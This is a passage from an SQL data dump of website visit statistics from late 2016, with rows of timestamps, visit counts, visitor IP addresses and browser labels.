(76663,1480350833,1,1,0,0,'91.196.178.65','firefox'),(76664,1480351046,1,1,0,0,'66.249.64.61','chrome'),(76665,1480351258,1,1,0,0,'5.45.255.72','chrome'),(76666,1480352391,1,1,0,0,'163.172.64.226','other'),(76667,1480352444,1,1,0,0,'91.196.178.67','chrome'),(76668,1480352682,1,1,0,0,'92.101.218.72','other'),(76669,1480352823,1,1,0,0,'95.213.218.52','other'),(76670,1480352836,1,1,0,0,'213.109.238.75','chrome'),(76671,1480354046,1,1,0,0,'66.102.9.29','chrome'),(76672,1480354272,1,1,0,0,'163.172.64.232','other'),(76673,1480355113,1,0,1,0,'66.249.64.59',''),(76674,1480355219,2,2,0,0,'157.55.39.195','other'),(76675,1480355660,1,1,0,0,'94.179.57.164','chrome'),(76676,1480357082,1,1,0,0,'66.249.64.183','chrome'),(76677,1480357304,1,1,0,0,'157.55.39.169','other'),(76678,1480358292,1,1,0,0,'66.249.64.187','chrome'),(76679,1480358536,1,1,0,0,'213.109.238.75','chrome'),(76680,1480359030,1,1,0,0,'141.8.142.61','other'),(76681,1480359934,1,1,0,0,'66.249.64.183','chrome'),(76682,1480360230,1,1,0,0,'141.8.183.25','other'),(76683,1480360339,1,1,0,0,'95.132.132.228','chrome'),(76684,1480361205,1,1,0,0,'180.76.15.14','other'),(76685,1480361223,1,1,0,0,'94.179.78.30','chrome'),(76686,1480361255,1,1,0,0,'66.102.9.29','other'),(76687,1480364184,1,1,0,0,'163.172.64.246','other'),(76688,1480365064,1,1,0,0,'157.55.39.195','other'),(76689,1480368164,1,0,1,0,'66.249.64.179',''),(76690,1480368687,2,1,1,0,'66.249.64.179',''),(76691,1480368705,1,1,0,0,'66.249.64.59','chrome'),(76692,1480370668,1,1,0,0,'66.249.64.179','chrome'),(76693,1480371383,2,0,2,0,'66.249.64.187',''),(76694,1480371427,1,1,0,0,'141.8.142.58','other'),(76695,1480371458,1,1,0,0,'95.27.228.2','msie'),(76696,1480372982,1,1,0,0,'95.135.198.81','chrome'),(76697,1480373530,1,1,0,0,'157.55.39.195','other'),(76698,1480375655,1,1,0,0,'66.102.9.27','other'),(76699,1480375903,1,1,0,0,'157.55.39.195','other'),(76700,1480376393,1,1,0,0,'163.172.64.222','other'),(76701,1480377343,1,1,0,0,'180.76.15.25','other'),(76702,1480379913,1,1,0,0,'163.172.64.242','other'),(76703,1480380065,1,1,0,0,'163.172.64.180','other'),(76704,1480380577,1,0,1,0,'66.249.64.59',''),(76705,1480382073,1,1,0,0,'163.172.64.237','other'),(76706,1480384373,1,1,0,0,'157.55.39.216','other'),(76707,1480385202,1,1,0,0,'141.8.142.58','other'),(76708,1480385391,1,1,0,0,'163.172.64.250','other'),(76709,1480386496,1,0,1,0,'66.249.64.179',''),(76710,1480387738,1,0,1,0,'66.249.64.187',''),(76711,1480388325,1,1,0,0,'163.172.64.192','other'),(76712,1480388345,1,1,0,0,'66.249.64.183','chrome'),(76713,1480388611,1,1,0,0,'66.249.64.179','chrome'),(76714,1480388726,1,1,0,0,'163.172.64.231','other'),(76715,1480390021,1,1,0,0,'66.102.9.25','other'),(76716,1480390463,1,0,1,0,'66.249.64.183',''),(76717,1480390724,1,1,0,0,'157.55.39.195','other'),(76718,1480391088,1,1,0,0,'130.193.50.34','other'),(76719,1480391738,1,0,1,0,'66.249.64.183',''),(76720,1480392698,1,1,0,0,'157.55.39.195','other'),(76721,1480392925,1,1,0,0,'66.249.64.183','chrome'),(76722,1480393006,1,1,0,0,'141.8.183.25','other'),(76723,1480393038,1,1,0,0,'130.193.50.34','other'),(76724,1480394341,1,1,0,0,'163.172.64.244','other'),(76725,1480394922,1,0,1,0,'66.249.64.59',''),(76726,1480396240,1,1,0,0,'130.193.50.34','other'),(76727,1480396253,1,1,0,0,'141.8.183.25','other'),(76728,1480398379,2,2,0,0,'66.249.64.187','chrome'),(76729,1480398427,1,1,0,0,'163.172.64.186','other'),(76730,1480400111,1,1,0,0,'163.172.64.227','other'),(76731,1480400603,1,1,0,0,'91.196.178.68','chrome'),(76732,1480400831,1,1,0,0,'91.196.178.66','chrome'),(76733,1480401527,1,1,0,0,'66.249.93.142','chrome'),(76734,1480401785,1,1,0,0,'66.249.64.183','chrome'),(76735,1480402068,1,1,0,0,'91.196.178.66','chrome'),(76736,1480402318,1,1,0,0,'94.179.6.129','firefox'),(76737,1480403240,2,0,2,0,'66.249.64.183',''),(76738,1480404036,1,0,1,0,'66.249.64.179',''),(76739,1480404426,1,1,0,0,'66.102.9.29','other'),(76740,1480405082,1,0,1,0,'66.249.64.183',''),(76741,1480405804,1,1,0,0,'37.53.179.125','chrome'),(76742,1480405935,1,1,0,0,'37.53.225.212','firefox'),(76743,1480406621,1,1,0,0,'66.249.64.183','chrome'),(76744,1480407002,1,1,0,0,'66.249.64.187','chrome'),(76745,1480408781,1,1,0,0,'130.180.216.235','chrome'),(76746,1480408811,1,1,0,0,'163.172.64.186','other'),(76747,1480409144,1,0,1,0,'66.249.64.61',''),(76748,1480409511,1,1,0,0,'91.196.178.166','chrome'),(76749,1480409850,1,1,0,0,'94.179.103.220','chrome'),(76750,1480410021,1,1,0,0,'130.180.217.153','opera'),(76751,1480410039,1,1,0,0,'130.193.50.34','other'),(76752,1480410445,1,1,0,0,'95.133.191.137','chrome'),(76753,1480410530,1,1,0,0,'37.55.224.5','chrome'),(76754,1480411061,1,0,1,0,'66.249.64.183',''),(76755,1480411475,1,1,0,0,'178.94.171.137','chrome'),(76756,1480411493,1,1,0,0,'91.196.178.167','chrome'),(76757,1480412107,1,1,0,0,'130.180.217.153','opera'),(76758,1480412355,1,1,0,0,'37.53.225.212','firefox'),(76759,1480414034,1,1,0,0,'91.196.178.132','firefox'),(76760,1480415488,1,1,0,0,'37.53.225.212','firefox'),(76761,1480415995,1,1,0,0,'78.111.185.149','firefox'),(76762,1480416017,1,0,1,0,'66.249.64.179',''),(76763,1480416067,1,1,0,0,'91.196.178.70','firefox'),(76764,1480416616,1,1,0,0,'141.8.183.25','other'),(76765,1480417976,1,1,0,0,'193.93.52.88','chrome'),(76766,1480418097,1,1,0,0,'93.74.212.147','firefox'),(76767,1480418878,1,1,0,0,'66.102.9.25','other'),(76768,1480419213,1,1,0,0,'163.172.64.181','other'),(76769,1480419478,1,0,1,0,'66.249.64.61',''),(76770,1480420171,1,1,0,0,'82.207.91.234','firefox'),(76771,1480420217,1,1,0,0,'37.52.120.56','chrome'),(76772,1480421007,1,1,0,0,'40.77.167.63','other'),(76773,1480425870,1,1,0,0,'5.255.253.47','other'),(76774,1480425880,1,1,0,0,'141.8.132.79','other'),(76775,1480426046,1,0,1,0,'68.180.229.190',''),(76776,1480427150,1,1,0,0,'40.77.167.63','other'),(76777,1480427221,1,1,0,0,'130.180.218.155','chrome'),(76778,1480428987,1,1,0,0,'91.196.178.65','firefox'),(76779,1480429259,2,2,0,0,'91.196.178.69','chrome'),(76780,1480429667,1,1,0,0,'37.53.225.212','firefox'),(76781,1480430752,1,1,0,0,'91.196.178.69','chrome'),(76782,1480430758,1,1,0,0,'91.196.178.68','firefox'),(76783,1480430937,1,1,0,0,'91.196.178.71','firefox'),(76784,1480431229,1,1,0,0,'37.53.225.212','firefox'),(76785,1480431476,1,1,0,0,'46.133.130.73','chrome'),(76786,1480432278,1,0,1,0,'66.249.64.183',''),(76787,1480433176,1,1,0,0,'37.53.225.212','firefox'),(76788,1480433337,1,1,0,0,'66.102.9.27','other'),(76789,1480434444,1,1,0,0,'141.8.142.61','other'),(76790,1480434657,1,1,0,0,'66.249.64.183','chrome'),(76791,1480434794,1,1,0,0,'5.45.255.68','chrome'),(76792,1480435244,1,1,0,0,'66.249.64.179','chrome'),(76793,1480436346,1,1,0,0,'180.76.15.145','other'),(76794,1480436405,1,1,0,0,'40.77.167.63','other'),(76795,1480436871,1,1,0,0,'66.249.64.183','chrome'),(76796,1480441464,1,1,0,0,'163.172.64.217','other'),(76797,1480441669,1,0,1,0,'66.249.64.179',''),(76798,1480441774,1,1,0,0,'130.180.210.56','firefox'),(76799,1480441974,1,1,0,0,'91.214.84.177','firefox'),(76800,1480442058,1,1,0,0,'37.54.22.254','chrome'),(76801,1480442486,1,1,0,0,'163.172.64.241','other'),(76802,1480442684,1,1,0,0,'37.115.113.62','firefox'),(76803,1480442737,1,1,0,0,'180.76.15.138','other'),(76804,1480444279,1,1,0,0,'66.249.64.179','chrome'),(76805,1480444416,1,0,1,0,'66.249.64.57',''),(76806,1480444622,1,1,0,0,'193.110.18.54','firefox'),(76807,1480444666,1,1,0,0,'141.8.183.25','other'),(76808,1480444828,1,1,0,0,'52.86.176.3','other'),(76809,1480447495,1,1,0,0,'66.249.64.183','chrome'),(76810,1480447519,1,1,0,0,'66.249.64.57','chrome'),(76811,1480447646,1,1,0,0,'82.145.223.15','other'),(76812,1480447737,1,1,0,0,'66.102.9.29','other'),(76813,1480450726,1,1,0,0,'91.196.178.38','chrome'),(76814,1480453634,1,0,1,0,'66.249.64.183',''),(76815,1480456529,1,1,0,0,'163.172.64.231','other'),(76816,1480456854,1,1,0,0,'163.172.64.248','other'),(76817,1480457329,1,1,0,0,'163.172.64.237','other'),(76818,1480458100,1,0,1,0,'66.249.64.59',''),(76819,1480458826,1,1,0,0,'130.193.50.34','other'),(76820,1480458833,1,1,0,0,'130.193.51.19','other'),(76821,1480459576,1,1,0,0,'163.172.64.177','other'),(76822,1480460619,1,0,1,0,'66.249.64.179',''),(76823,1480461035,2,2,0,0,'40.77.167.63','other'),(76824,1480462218,1,1,0,0,'66.102.9.25','other'),(76825,1480464105,1,1,0,0,'163.172.64.228','other'),(76826,1480465129,1,1,0,0,'66.249.64.179','chrome'),(76827,1480465885,1,1,0,0,'89.252.3.150','chrome'),(76828,1480465907,1,1,0,0,'130.193.50.34','other'),(76829,1480469073,1,1,0,0,'68.42.238.124','firefox'),(76830,1480473140,1,1,0,0,'163.172.64.246','other'),(76831,1480473301,1,0,1,0,'66.249.64.183',''),(76832,1480474908,1,1,0,0,'66.249.64.61','chrome'),(76833,1480475039,1,0,1,0,'66.249.64.59',''),(76834,1480475290,1,1,0,0,'180.76.15.153','other'),(76835,1480476548,1,1,0,0,'66.102.9.25','other'),(76836,1480477403,1,0,1,0,'66.249.64.179',''),(76837,1480480947,1,1,0,0,'66.249.64.183','chrome'),(76838,1480482846,1,1,0,0,'66.249.64.179','chrome'),(76839,1480485771,1,1,0,0,'163.172.64.199','other'),(76840,1480487090,1,1,0,0,'94.179.49.195','firefox'),(76841,1480488111,1,1,0,0,'91.196.178.68','other'),(76842,1480489101,1,1,0,0,'91.196.178.68','chrome'),(76843,1480489736,1,1,0,0,'31.41.70.5','opera'),(76844,1480490136,1,1,0,0,'66.249.93.142','chrome'),(76845,1480490735,1,0,1,0,'66.249.64.61',''),(76846,1480490985,1,1,0,0,'66.102.9.27','other'),(76847,1480492076,1,1,0,0,'91.196.178.68','chrome'),(76848,1480492120,1,1,0,0,'37.52.22.88','firefox'),(76849,1480492425,1,0,1,0,'66.249.64.187',''),(76850,1480492593,1,1,0,0,'91.196.178.133','firefox'),(76851,1480494013,1,0,1,0,'66.249.64.183',''),(76852,1480495036,1,1,0,0,'130.193.37.21','other'),(76853,1480495038,1,1,0,0,'141.8.132.2','other'),(76854,1480495076,1,1,0,0,'91.196.178.133','firefox'),(76855,1480495204,1,1,0,0,'40.77.167.63','other'),(76856,1480495869,1,1,0,0,'46.201.41.244','chrome'),(76857,1480496092,1,1,0,0,'66.102.9.25','other'),(76858,1480496105,1,1,0,0,'163.172.64.236','other'),(76859,1480496453,1,1,0,0,'178.92.84.100','firefox'),(76860,1480496465,1,1,0,0,'37.52.22.88','firefox'),(76861,1480496933,1,1,0,0,'93.158.152.51','other'),(76862,1480496973,1,1,0,0,'5.255.253.68','other'),(76863,1480496976,1,1,0,0,'141.8.132.41','other'),(76864,1480496980,1,1,0,0,'5.255.253.47','other'),(76865,1480497272,1,1,0,0,'78.111.185.35','chrome'),(76866,1480497494,1,1,0,0,'37.52.22.88','firefox'),(76867,1480498279,1,0,1,0,'66.249.64.183',''),(76868,1480498338,1,1,0,0,'178.92.84.100','firefox'),(76869,1480498916,1,1,0,0,'37.52.22.88','firefox'),(76870,1480500113,1,1,0,0,'91.124.27.185','chrome'),(76871,1480500570,1,1,0,0,'185.26.182.35','opera'),(76872,1480501721,1,0,1,0,'66.249.64.179',''),(76873,1480502042,1,0,1,0,'66.249.64.59',''),(76874,1480503994,1,1,0,0,'91.196.177.26','chrome'),(76875,1480504752,1,1,0,0,'46.201.75.121','firefox'),(76876,1480505222,1,1,0,0,'180.76.15.27','other'),(76877,1480505431,1,1,0,0,'66.102.9.27','other'),(76878,1480506538,1,1,0,0,'217.69.133.217','other'),(76879,1480506869,1,1,0,0,'91.196.178.72','firefox'),(76880,1480506923,1,1,0,0,'163.172.64.181','other'),(76881,1480507298,1,0,1,0,'66.249.64.183',''),(76882,1480507322,1,1,0,0,'157.55.39.76','other'),(76883,1480507477,1,1,0,0,'23.101.61.176','other'),(76884,1480508464,1,1,0,0,'91.196.178.68','firefox'),(76885,1480508868,1,1,0,0,'91.196.177.46','chrome'),(76886,1480508902,1,0,1,0,'66.249.64.183',''),(76887,1480509058,1,1,0,0,'163.172.64.241','other'),(76888,1480509091,1,1,0,0,'37.52.22.88','firefox'),(76889,1480509164,1,0,1,0,'66.249.64.61',''),(76890,1480509214,1,0,1,0,'66.249.64.187',''),(76891,1480510315,1,1,0,0,'37.52.22.88','firefox'),(76892,1480510650,1,1,0,0,'178.92.84.100','firefox'),(76893,1480511062,1,0,1,0,'66.249.64.187',''),(76894,1480511099,1,1,0,0,'91.196.178.67','firefox'),(76895,1480511507,1,1,0,0,'178.95.41.137','chrome'),(76896,1480511646,1,1,0,0,'195.189.50.4','chrome'),(76897,1480511656,1,1,0,0,'5.255.253.47','other'),(76898,1480512351,1,1,0,0,'91.196.178.67','firefox'),(76899,1480512753,1,1,0,0,'37.52.22.88','firefox'),(76900,1480513049,1,0,1,0,'66.249.64.179',''),(76901,1480513112,1,0,1,0,'66.249.64.59',''),(76902,1480513332,1,1,0,0,'5.58.59.224','msie'),(76903,1480513469,1,1,0,0,'163.172.64.236','other'),(76904,1480513810,1,1,0,0,'40.77.167.63','other'),(76905,1480514344,1,1,0,0,'91.196.178.69','chrome'),(76906,1480514608,2,1,1,0,'66.249.64.179',''),(76907,1480514781,1,1,0,0,'207.46.13.137','other'),(76908,1480515635,1,0,1,0,'66.249.64.179',''),(76909,1480516230,2,2,0,0,'91.196.178.69','chrome'),(76910,1480516581,1,1,0,0,'94.179.85.129','msie'),(76911,1480517025,1,1,0,0,'91.196.178.66','firefox'),(76912,1480517661,2,2,0,0,'163.172.64.181','other'),(76913,1480518101,1,1,0,0,'66.249.64.183','chrome'),(76914,1480518153,1,1,0,0,'91.196.177.46','firefox'),(76915,1480518983,1,1,0,0,'163.172.64.249','other'),(76916,1480519741,1,1,0,0,'91.196.178.67','firefox'),(76917,1480519886,1,1,0,0,'66.102.9.25','other'),(76918,1480521181,1,1,0,0,'37.52.22.88','chrome'),(76919,1480521430,3,3,0,0,'66.249.64.183','chrome'),(76920,1480521585,1,1,0,0,'66.249.64.187','chrome'),(76921,1480521639,1,1,0,0,'46.211.2.74','chrome'),(76922,1480521838,1,1,0,0,'163.172.64.222','other'),(76923,1480523169,1,1,0,0,'66.249.64.183','chrome'),(76924,1480523263,1,1,0,0,'178.92.84.100','firefox'),(76925,1480523352,1,0,1,0,'66.249.64.187',''),(76926,1480523493,1,1,0,0,'82.145.222.113','other'),(76927,1480524749,1,0,1,0,'66.249.64.183',''),(76928,1480524750,1,1,0,0,'42.60.137.148','firefox'),(76929,1480524807,1,0,1,0,'66.249.64.57',''),(76930,1480525181,1,1,0,0,'193.110.22.51','chrome'),(76931,1480525578,1,1,0,0,'163.172.64.177','other'),(76932,1480525659,1,1,0,0,'163.172.64.249','other'),(76933,1480525900,1,1,0,0,'66.249.64.179','chrome'),(76934,1480526060,1,0,1,0,'66.249.64.61',''),(76935,1480527230,1,1,0,0,'5.58.11.190','msie'),(76936,1480527262,1,1,0,0,'91.196.178.165','chrome'),(76937,1480527423,1,1,0,0,'66.249.64.179','chrome'),(76938,1480528980,1,1,0,0,'66.249.64.61','chrome'),(76939,1480531272,1,1,0,0,'91.196.178.36','chrome'),(76940,1480531937,1,1,0,0,'163.172.64.248','other'),(76941,1480532376,4,4,0,0,'130.193.50.34','other'),(76942,1480532523,1,0,1,0,'68.180.228.32',''),(76943,1480533635,1,1,0,0,'82.145.220.9','other'),(76944,1480534443,1,1,0,0,'66.102.9.27','other'),(76945,1480534916,1,0,1,0,'68.180.229.190',''),(76946,1480538114,1,1,0,0,'91.196.178.71','firefox'),(76947,1480538401,1,1,0,0,'163.172.64.234','other'),(76948,1480540513,1,0,1,0,'66.249.64.187',''),(76949,1480542418,1,0,1,0,'66.249.64.179',''),(76950,1480542544,1,0,1,0,'66.249.64.59',''),(76951,1480543633,1,1,0,0,'176.195.122.197','chrome'),(76952,1480544032,1,0,1,0,'66.249.64.187',''),(76953,1480544055,1,1,0,0,'163.172.64.229','other'),(76954,1480544495,1,1,0,0,'163.172.64.235','other'),(76955,1480545042,2,1,1,0,'62.210.83.88',''),(76956,1480546247,1,1,0,0,'163.172.64.228','other'),(76957,1480546418,1,0,1,0,'66.249.64.187',''),(76958,1480546568,1,1,0,0,'66.249.64.187','chrome'),(76959,1480547087,1,1,0,0,'163.172.64.225','other'),(76960,1480547286,1,1,0,0,'93.80.145.197','msie'),(76961,1480547796,1,0,1,0,'66.249.64.179',''),(76962,1480548065,1,0,1,0,'66.249.64.57',''),(76963,1480548851,1,1,0,0,'66.102.9.27','other'),(76964,1480551690,1,1,0,0,'163.172.64.235','other'),(76965,1480552130,1,1,0,0,'157.55.39.195','other'),(76966,1480553239,1,0,1,0,'66.249.64.183',''),(76967,1480553661,1,1,0,0,'66.249.64.59','chrome'),(76968,1480555015,1,0,1,0,'66.249.64.183',''),(76969,1480557754,1,1,0,0,'163.172.64.229','other'),(76970,1480558949,1,1,0,0,'180.76.15.134','other'),(76971,1480559011,1,0,1,0,'66.249.64.59',''),(76972,1480559951,1,1,0,0,'163.172.64.220','other'),(76973,1480560693,1,0,1,0,'66.249.64.183',''),(76974,1480561363,1,0,1,0,'66.249.64.187',''),(76975,1480561648,1,1,0,0,'91.196.178.37','chrome'),(76976,1480561675,1,0,1,0,'66.249.64.179',''),(76977,1480563117,1,1,0,0,'66.102.9.27','other'),(76978,1480563287,1,1,0,0,'157.55.39.137','other'),(76979,1480563844,1,1,0,0,'66.249.64.183','chrome'),(76980,1480565549,2,2,0,0,'66.249.64.183','chrome'),(76981,1480565971,1,1,0,0,'66.249.64.179','chrome'),(76982,1480566648,1,1,0,0,'66.249.64.183','chrome'),(76983,1480567630,2,2,0,0,'66.249.64.179','chrome'),(76984,1480568562,2,2,0,0,'130.193.50.34','other'),(76985,1480569203,3,1,2,0,'66.249.64.183',''),(76986,1480569381,2,0,2,0,'66.249.64.179',''),(76987,1480569720,2,0,2,0,'66.249.64.187',''),(76988,1480572853,1,1,0,0,'91.196.178.69','firefox'),(76989,1480573181,2,0,2,0,'66.249.64.183',''),(76990,1480574101,1,1,0,0,'91.196.178.40','chrome'),(76991,1480574187,1,1,0,0,'66.102.9.25','chrome'),(76992,1480574650,1,0,1,0,'66.249.64.183',''),(76993,1480574682,1,1,0,0,'109.108.88.165','chrome'),(76994,1480574835,1,1,0,0,'91.196.178.68','chrome'),(76995,1480575006,1,1,0,0,'94.179.81.92','firefox'),(76996,1480575195,1,1,0,0,'5.228.95.91','firefox'),(76997,1480575467,1,1,0,0,'31.43.36.124','other'),(76998,1480576317,1,1,0,0,'37.53.239.221','firefox'),(76999,1480577033,1,1,0,0,'178.93.194.34','msie'),(77000,1480577275,1,1,0,0,'130.180.219.173','chrome'),(77001,1480577481,1,1,0,0,'66.102.9.27','other'),(77002,1480578644,2,2,0,0,'91.196.178.67','firefox'),(77003,1480579445,1,1,0,0,'91.196.178.69','firefox'),(77004,1480579765,1,0,1,0,'66.249.64.179',''),(77005,1480579878,1,1,0,0,'46.174.125.28','firefox'),(77006,1480579891,1,0,1,0,'66.249.64.187',''),(77007,1480580088,1,1,0,0,'163.172.64.178','other'),(77008,1480580576,1,1,0,0,'95.134.202.225','firefox'),(77009,1480580963,1,1,0,0,'157.55.39.195','other'),(77010,1480582455,1,1,0,0,'95.134.202.225','firefox'),(77011,1480582844,1,0,1,0,'66.249.64.187',''),(77012,1480582845,1,1,0,0,'46.200.128.142','chrome'),(77013,1480582959,1,1,0,0,'92.112.56.72','chrome'),(77014,1480582966,1,1,0,0,'130.193.50.34','other'),(77015,1480584137,1,1,0,0,'78.111.185.140','firefox'),(77016,1480584387,1,1,0,0,'92.112.56.72','chrome'),(77017,1480584433,1,1,0,0,'109.251.210.100','chrome'),(77018,1480584479,2,2,0,0,'130.193.51.19','other'),(77019,1480584502,1,1,0,0,'163.172.64.179','other'),(77020,1480584503,1,1,0,0,'130.193.50.34','other'),(77021,1480584554,1,1,0,0,'178.140.87.197','chrome'),(77022,1480584602,1,1,0,0,'163.172.64.225','other'),(77023,1480585105,1,1,0,0,'91.196.178.68','chrome'),(77024,1480585792,1,1,0,0,'37.53.226.25','chrome'),(77025,1480585834,1,0,1,0,'66.249.64.187',''),(77026,1480586549,1,1,0,0,'91.196.178.67','firefox'),(77027,1480586586,1,1,0,0,'95.134.202.225','firefox'),(77028,1480587045,1,1,0,0,'40.77.167.63','other'),(77029,1480587283,1,0,1,0,'66.249.64.187',''),(77030,1480589371,1,1,0,0,'95.134.202.225','firefox'),(77031,1480589826,1,1,0,0,'213.108.45.66','chrome'),(77032,1480590036,1,1,0,0,'180.76.15.15','other'),(77033,1480590844,1,1,0,0,'163.172.64.253','other'),(77034,1480591611,1,1,0,0,'91.196.178.68','chrome'),(77035,1480591851,1,1,0,0,'66.102.9.29','other'),(77036,1480592373,1,1,0,0,'91.124.26.183','chrome'),(77037,1480592380,1,1,0,0,'91.196.178.164','chrome'),(77038,1480592655,1,1,0,0,'91.196.178.70','firefox'),(77039,1480592828,1,1,0,0,'46.73.170.30','opera'),(77040,1480593331,1,0,1,0,'68.180.229.190',''),(77041,1480595340,1,0,1,0,'66.249.64.179',''),(77042,1480595503,1,0,1,0,'66.249.64.183',''),(77043,1480596042,1,1,0,0,'95.132.134.215','chrome'),(77044,1480596538,1,1,0,0,'163.172.64.225','other'),(77045,1480597143,1,1,0,0,'91.196.178.72','firefox'),(77046,1480597364,1,1,0,0,'91.196.178.132','chrome'),(77047,1480597659,1,1,0,0,'37.54.199.210','chrome'),(77048,1480597691,1,1,0,0,'82.145.221.237','other'),(77049,1480598270,1,1,0,0,'66.249.64.183','chrome'),(77050,1480598339,1,1,0,0,'163.172.64.180','other'),(77051,1480598464,2,2,0,0,'178.137.81.78','other'),(77052,1480599467,1,1,0,0,'94.179.13.94','firefox'),(77053,1480600817,1,1,0,0,'91.124.34.158','chrome'),(77054,1480601197,1,1,0,0,'91.196.178.68','other'),(77055,1480602165,1,0,1,0,'66.249.64.187',''),(77056,1480602631,1,1,0,0,'66.249.64.179','chrome'),(77057,1480603129,1,1,0,0,'93.74.206.154','chrome'),(77058,1480603652,1,1,0,0,'178.93.148.127','firefox'),(77059,1480604216,1,1,0,0,'195.10.210.49','chrome'),(77060,1480605120,1,1,0,0,'91.196.178.68','other'),(77061,1480605193,1,1,0,0,'91.196.177.46','firefox'),(77062,1480605470,1,1,0,0,'37.53.74.49','other'),(77063,1480605985,1,1,0,0,'66.249.64.179','chrome'),(77064,1480606496,1,1,0,0,'66.102.9.25','other'),(77065,1480606885,1,1,0,0,'130.193.50.34','other'),(77066,1480606887,1,0,1,0,'66.249.64.59',''),(77067,1480607307,2,2,0,0,'46.118.154.22','other'),(77068,1480607408,1,0,1,0,'66.249.64.183',''),(77069,1480608034,1,0,1,0,'66.249.64.179',''),(77070,1480608354,1,1,0,0,'66.249.64.179','chrome'),(77071,1480609396,1,1,0,0,'163.172.64.246','other'),(77072,1480609571,1,1,0,0,'31.41.89.188','other'),(77073,1480609654,1,0,1,0,'66.249.64.183',''),(77074,1480611307,1,0,1,0,'66.249.64.183',''),(77075,1480612041,1,1,0,0,'46.211.252.93','chrome'),(77076,1480612310,1,1,0,0,'212.113.43.228','firefox'),(77077,1480614125,1,0,1,0,'66.249.64.59',''),(77078,1480614403,1,0,1,0,'66.249.64.187',''),(77079,1480615270,1,1,0,0,'163.172.64.231','other'),(77080,1480616447,1,1,0,0,'91.196.178.70','firefox'),(77081,1480617293,1,1,0,0,'66.249.64.183','chrome'),(77082,1480617486,1,1,0,0,'66.249.64.59','chrome'),(77083,1480617547,1,1,0,0,'180.76.15.10','other'),(77084,1480618193,1,0,1,0,'66.249.64.179',''),(77085,1480618325,1,1,0,0,'95.135.4.43','other'),(77086,1480618376,1,0,1,0,'66.249.64.183',''),(77087,1480618442,1,0,1,0,'66.249.64.57',''),(77088,1480618686,1,0,1,0,'66.249.64.187',''),(77089,1480620236,1,1,0,0,'66.249.64.187','chrome'),(77090,1480620621,1,1,0,0,'66.102.9.29','other'),(77091,1480621608,1,1,0,0,'130.193.50.34','other'),(77092,1480622929,1,1,0,0,'163.172.64.241','other'),(77093,1480624386,1,1,0,0,'157.55.39.137','other'),(77094,1480625957,1,0,1,0,'66.249.64.183',''),(77095,1480625994,2,0,2,0,'66.249.64.179',''),(77096,1480626484,1,1,0,0,'157.55.39.137','other'),(77097,1480628154,1,0,1,0,'66.249.64.179',''),(77098,1480628262,1,0,1,0,'66.249.64.59',''),(77099,1480629708,1,1,0,0,'157.55.39.137','other'),(77100,1480630932,1,1,0,0,'180.76.15.147','other'),(77101,1480631638,1,0,1,0,'68.180.229.190',''),(77102,1480631845,1,1,0,0,'180.76.15.28','other'),(77103,1480635176,1,1,0,0,'66.102.9.29','other'),(77104,1480637468,1,0,1,0,'66.249.64.179',''),(77105,1480637608,1,1,0,0,'66.249.64.183','chrome'),(77106,1480640047,1,0,1,0,'66.249.64.179',''),(77107,1480641007,1,1,0,0,'66.102.9.27','chrome'),(77108,1480641891,1,1,0,0,'163.172.64.233','other'),(77109,1480645494,1,0,1,0,'66.249.64.179',''),(77110,1480645563,1,0,1,0,'66.249.64.187',''),(77111,1480649458,1,1,0,0,'66.102.9.27','other'),(77112,1480651344,1,0,1,0,'66.249.64.187',''),(77113,1480653024,1,1,0,0,'178.94.172.164','chrome'),(77114,1480656568,1,1,0,0,'163.172.64.229','other'),(77115,1480657239,1,1,0,0,'46.42.171.79','msie'),(77116,1480658388,1,1,0,0,'66.249.64.61','chrome'),(77117,1480659014,1,1,0,0,'66.102.9.25','other'),(77118,1480659541,1,1,0,0,'91.196.178.69','chrome'),(77119,1480659553,1,1,0,0,'130.193.50.34','other'),(77120,1480659613,1,1,0,0,'91.196.178.65','firefox'),(77121,1480659969,1,1,0,0,'66.249.64.183','chrome'),(77122,1480660697,1,1,0,0,'91.196.178.68','chrome'),(77123,1480661054,1,1,0,0,'94.179.13.94','firefox'),(77124,1480661191,1,0,1,0,'66.249.64.179',''),(77125,1480661791,1,0,1,0,'66.249.64.59',''),(77126,1480662755,1,1,0,0,'40.77.167.63','other'),(77127,1480663642,1,1,0,0,'130.193.51.19','other'),(77128,1480663646,1,1,0,0,'141.8.183.25','other'),(77129,1480663874,1,1,0,0,'66.249.93.157','chrome'),(77130,1480663938,1,1,0,0,'66.102.9.25','other'),(77131,1480664072,1,1,0,0,'95.132.20.152','firefox'),(77132,1480664202,1,0,1,0,'66.249.64.187',''),(77133,1480664404,1,1,0,0,'91.196.178.135','firefox'),(77134,1480664937,1,1,0,0,'91.196.178.67','firefox'),(77135,1480666110,1,1,0,0,'163.172.64.177','other'),(77136,1480666300,1,1,0,0,'163.172.64.216','other'),(77137,1480666735,1,1,0,0,'91.196.178.67','firefox'),(77138,1480667169,1,1,0,0,'163.172.64.226','other'),(77139,1480667519,1,1,0,0,'94.179.61.133','chrome'),(77140,1480670117,1,1,0,0,'91.121.181.101','other'),(77141,1480670335,1,1,0,0,'66.102.9.27','chrome'),(77142,1480670741,1,1,0,0,'40.77.167.63','other'),(77143,1480670875,1,1,0,0,'91.196.178.67','firefox'),(77144,1480671896,1,1,0,0,'91.196.178.70','chrome'),(77146,1480672635,1,1,0,0,'130.180.218.236','chrome'),(77147,1480674191,1,1,0,0,'66.249.64.187','chrome'),(77148,1480674447,1,1,0,0,'91.196.178.67','firefox'),(77149,1480674618,2,2,0,0,'66.249.64.183','chrome'),(77150,1480675161,1,1,0,0,'95.134.202.225','firefox'),(77151,1480677150,1,1,0,0,'163.172.64.199','other'),(77152,1480677877,1,1,0,0,'91.124.45.76','chrome'),(77153,1480678328,1,1,0,0,'66.102.9.29','other'),(77154,1480678491,1,1,0,0,'176.123.220.80','firefox'),(77155,1480678607,1,1,0,0,'46.211.114.53','other'),(77156,1480678794,1,1,0,0,'91.196.178.65','firefox'),(77157,1480678949,1,1,0,0,'207.46.13.91','other'),(77158,1480680076,1,0,1,0,'66.249.64.179',''),(77159,1480681203,1,1,0,0,'91.196.177.26','chrome'),(77160,1480682018,1,1,0,0,'195.191.214.234','firefox'),(77161,1480682369,1,1,0,0,'91.196.178.67','firefox'),(77162,1480684032,1,1,0,0,'193.19.152.14','chrome'),(77163,1480684636,1,1,0,0,'91.196.178.67','firefox'),(77164,1480684778,1,1,0,0,'95.134.202.225','firefox'),(77165,1480685273,1,1,0,0,'91.196.178.167','chrome'),(77166,1480686633,1,1,0,0,'180.76.15.134','other'),(77167,1480686867,1,1,0,0,'207.46.13.91','other'),(77168,1480687239,1,1,0,0,'163.172.64.230','other'),(77169,1480687254,2,2,0